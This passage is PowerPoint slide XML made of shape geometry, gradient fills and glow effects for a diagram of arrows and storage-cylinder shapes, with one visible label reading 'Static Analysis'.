        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1589323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Bent-Up Arrow 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1483733" y="4135420"/>
            <a:ext cx="849730" cy="1979376"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 3589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585200" y="6308725"/>
            <a:ext cx="406400" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E93C9998-D43C-414D-B668-2ADDEF99A61C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Static Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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85280" y="1322045"/>
            <a:ext cx="5473700" cy="241705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11500" y="3818109"/>
            <a:ext cx="5473700" cy="2299904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583863" y="1313333"/>
            <a:ext cx="2198318" cy="3663863"/>
            <a:chOff x="2266051" y="1468555"/>
            <a:chExt cx="2198318" cy="3663863"/>
          </a:xfrm>
          <a:effectLst>
            <a:glow>
              <a:schemeClr val="accent1">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2266051" y="1468556"/>
              <a:ext cx="2198318" cy="366386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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2731399" y="3125209"/>
              <a:ext cx="1267622" cy="825036"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825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7622" h="825036">
                  <a:moveTo>
                    <a:pt x="72605" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496576" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="730729" y="0"/>
                    <a:pt x="1267622" y="184691"/>
                    <a:pt x="1267622" y="412518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1267622" y="640345"/>
                    <a:pt x="730729" y="825036"/>
                    <a:pt x="496576" y="825036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72605" y="825035"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-20837" y="550023"/>
                    <a:pt x="-27511" y="248315"/>
                    <a:pt x="7260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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2735708" y="3307844"/>
              <a:ext cx="1259004" cy="451151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825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77648" h="825038">
                  <a:moveTo>
                    <a:pt x="42588" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="506602" y="2"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="740755" y="2"/>
                    <a:pt x="1277648" y="184693"/>
                    <a:pt x="1277648" y="412520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1277648" y="640347"/>
                    <a:pt x="740755" y="825038"/>
                    <a:pt x="506602" y="825038"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42585" y="825036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-10810" y="550025"/>
                    <a:pt x="-17482" y="248315"/>
                    <a:pt x="42588" y="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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="51000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="32000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3124930" y="3941265"/>
              <a:ext cx="480561" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30034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glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889707"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:pattFill prst="narVert">
              <a:fgClr>
                <a:schemeClr val="tx1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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889706"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="94000">
                  <a:srgbClr val="1D1D1D">
                    <a:alpha val="16000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="5000">
                  <a:srgbClr val="131313">
                    <a:alpha val="60000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="262626"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                    <a:alpha val="93000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1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2960628" y="3197416"/>
              <a:ext cx="809164" cy="33019"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24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24799" h="24102">
                  <a:moveTo>
                    <a:pt x="0" y="24102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140163" y="7416"/>
                    <a:pt x="266842" y="0"/>
                    <a:pt x="404308" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541774" y="0"/>
                    <a:pt x="824799" y="24102"/>
                    <a:pt x="824799" y="24102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w="139700" prst="cross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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3194770" y="3941265"/>
              <a:ext cx="340880" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
